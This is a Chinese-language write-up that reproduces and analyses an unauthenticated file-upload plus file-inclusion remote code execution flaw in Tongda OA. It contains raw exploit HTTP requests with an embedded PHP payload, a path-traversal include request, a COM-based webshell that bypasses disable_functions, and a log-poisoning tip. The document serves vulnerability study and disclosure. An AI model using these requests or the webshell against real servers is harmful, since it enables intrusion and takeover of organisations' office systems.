目錄
3.13通達OA文件上傳+包含getshell
簡述
通達OA是北京通達信科科技有限公司出品的 "Office Anywhere 通達網絡智能辦公系統"。
3月13日,通達OA在官方論壇發布通告稱,近日接到用戶反饋遭到勒索病毒攻擊,提示用戶注意安全風險,並且於同一天對所有版本發布了加固補丁。
在受影響的版本中,攻擊者可以在未認證的情況下向服務器上傳jpg圖片文件,然后包含該文件,造成遠程代碼執行。該漏洞無需登錄即可觸發。
影響版本
文件上傳漏洞為全版本通殺
v11
2017
2016
2015
2013 增強版
2013
文件包含漏洞只有2017和V11.3版本存在
手工復現
V11.3
上傳
/ispirit/im/upload.php
POST /ispirit/im/upload.php HTTP/1.1
Host: 192.168.146.180:85
Content-Length: 658
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: PHPSESSID=123
Connection: close
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"
2
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"
123
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"
1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg
<?php
echo 123;
?>
------WebKitFormBoundarypyfBh1YB4pV8McGB--
2003/826110489.jpg
包含
/ispirit/interface/gateway.php
POST /ispirit/interface/gateway.php? HTTP/1.1
Host: 192.168.146.180:85
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
Origin: http://192.168.146.180:85
Connection: close
Referer: http://192.168.146.180:85/ispirit/interface/gateway.php?
Cookie:
Upgrade-Insecure-Requests: 1
json={"url":"../../general/../../attach/im/2003/826110489.jpg"}
如果burp包含不成功建議通過瀏覽器利用hackbar發post包含試試
分析
代碼加密方式為zend54,在線解密http://dezend.qiling.org/free/
V11.3
上傳
/ispirit/im/upload.php
$P = $_POST['P'];
if (isset($P) || $P != '') {
ob_start();
include_once 'inc/session.php';
session_id($P);
session_start();
session_write_close();
} else {
include_once './auth.php';
}
當POST提交P參數時,包含inc/session.php獲取session,否則就會包含/auth.php進行用戶認證。
需要POST提交DEST_UID,不為0和空的數字即可繞過exit
1<=count($_FILES)判斷是否有文件上傳,如果上傳包中存在文件且$UPLOAD_MODE == '1'則調用upload()上傳,
返回[vm]$ATTACHMENT_ID|$ATTACHMENT_NAME|$DURATION[/vm]
在utility_file.php中的1839行檢查filename中的php
直接上傳php會被攔但加個點.或空格.即可繞過,win環境可用
utility_file.php的1352和1451行會檢查:,所以利用:繞過不可行
后根據大佬的文章和自己的測試總結
UPLOAD_MODE取1,2,3均可
有P參數提交
DEST_UID不為0和空的數字
即可無認證上傳
包含
/ispirit/interface/gateway.php
直接包含inc/session.php獲取session,即無需認證
不傳遞P參數即可繞過此處if判斷
if ($json) {
$json = stripcslashes($json);
$json = (array) json_decode($json);
foreach ($json as $key => $val) {
if ($key == 'data') {
$val = (array) $val;
foreach ($val as $keys => $value) {
${$keys} = $value;
}
}
if ($key == 'url') {
$url = $val;
}
}
if ($url != '') {
if (substr($url, 0, 1) == '/') {
$url = substr($url, 1);
}
if (strpos($url, 'general/') !== false || strpos($url, 'ispirit/') !== false || strpos($url, 'module/') !== false) {
include_once $url;
}
}
exit;
}
傳遞json數據,且url參數的值中含
general/
ispirit/
module/
三個字符串中的一個即可包含url
補充
變量覆蓋
OA之前報過變量覆蓋的洞,所以直接傳入的參數就會覆蓋掉變量里的值,這也是UPLOAD_MODE、P、DEST_UID可以直接傳入的原因。
繞disable_function
php.ini有disable_function,可使用com組件繞過
<?php
$command=$_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
直接包含錯誤日志getshell
利用包含漏洞包含Nginx的錯誤日志getshell
參考
https://github.com/jas502n/OA-tongda-RCE
https://mp.weixin.qq.com/s?__biz=MzU2NTY1NTQxNw==&mid=2247485643&idx=1&sn=fbf88da313852b50be15b08a7a5d602f&chksm=fcb92addcbcea3cbf71f4151cb19df4509dc6dea1ef86bed8ceef3b99210745994b815646d69&mpshare=1&scene=23&srcid=&sharer_sharetime=1585054739883&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd
https://mp.weixin.qq.com/s?__biz=MzU0ODg2MDA0NQ==&mid=2247483721&idx=1&sn=46545810034290c69fd273443398cf8c&chksm=fbb9f8abccce71bdd038dd93a5701f7d275a242e304e66636c53670ca6bcdb2126b099e2971f&mpshare=1&scene=23&srcid=&sharer_sharetime=1584599692956&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd
https://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650460286&idx=2&sn=33bab282bdc585b969d78d1e5aeef946&chksm=83bbb59ab4cc3c8c7ad16de72e24f65192e84e7217a1860b6b7d9dc7e6c2ac3cfc827c35e112&mpshare=1&scene=23&srcid=&sharer_sharetime=1584764219575&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd
https://mp.weixin.qq.com/s?__biz=MzI0NzEwOTM0MA==&mid=2652474779&idx=1&sn=39abda9c01a8cfda4c7075be21ce032d&chksm=f2582e28c52fa73ef3f40a635849d12df2268ff181f0e28f6f9dd94da9f9692645ee6b2d14af&mpshare=1&scene=23&srcid=&sharer_sharetime=1584764427295&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd
https://mp.weixin.qq.com/s?__biz=MzU1NDkwMzAyMg==&mid=2247484095&idx=1&sn=ba1519a0a98b662962d7e5e29e365f6d&chksm=fbdd363eccaabf28d4301e785f5827e459f8985b5e35d090795333d6a9703a38dae23b060183&mpshare=1&scene=23&srcid=&sharer_sharetime=1584765842974&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd[TOC]
https://github.com/jas502n/OA-tongda-RCE
https://mp.weixin.qq.com/s?__biz=MzI0NzEwOTM0MA==&mid=2652474779&idx=1&sn=39abda9c01a8cfda4c7075be21ce032d&chksm=f2582e28c52fa73ef3f40a635849d12df2268ff181f0e28f6f9dd94da9f9692645ee6b2d14af&mpshare=1&scene=23&srcid=&sharer_sharetime=1584764427295&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd
https://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650460286&idx=2&sn=33bab282bdc585b969d78d1e5aeef946&chksm=83bbb59ab4cc3c8c7ad16de72e24f65192e84e7217a1860b6b7d9dc7e6c2ac3cfc827c35e112&mpshare=1&scene=23&srcid=&sharer_sharetime=1584764219575&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd
https://mp.weixin.qq.com/s?__biz=MzU0ODg2MDA0NQ==&mid=2247483721&idx=1&sn=46545810034290c69fd273443398cf8c&chksm=fbb9f8abccce71bdd038dd93a5701f7d275a242e304e66636c53670ca6bcdb2126b099e2971f&mpshare=1&scene=23&srcid=&sharer_sharetime=1584599692956&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd
https://mp.weixin.qq.com/s?__biz=MzU1NDkwMzAyMg==&mid=2247484094&idx=1&sn=bea74b8c5d2d1a3880f24d2cb6c5a7a1&chksm=fbdd363fccaabf2932e47201b1ddf7ed85291fbe85643fa9755aa9381942605cd77683a38f9b&mpshare=1&scene=23&srcid=&sharer_sharetime=1584681671858&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd
https://mp.weixin.qq.com/s?__biz=MzU1NDkwMzAyMg==&mid=2247484095&idx=1&sn=ba1519a0a98b662962d7e5e29e365f6d&chksm=fbdd363eccaabf28d4301e785f5827e459f8985b5e35d090795333d6a9703a38dae23b060183&mpshare=1&scene=23&srcid=&sharer_sharetime=1584765842974&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd
https://mp.weixin.qq.com/s?__biz=MzU2NTY1NTQxNw==&mid=2247485643&idx=1&sn=fbf88da313852b50be15b08a7a5d602f&chksm=fcb92addcbcea3cbf71f4151cb19df4509dc6dea1ef86bed8ceef3b99210745994b815646d69&mpshare=1&scene=23&srcid=&sharer_sharetime=1585054739883&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd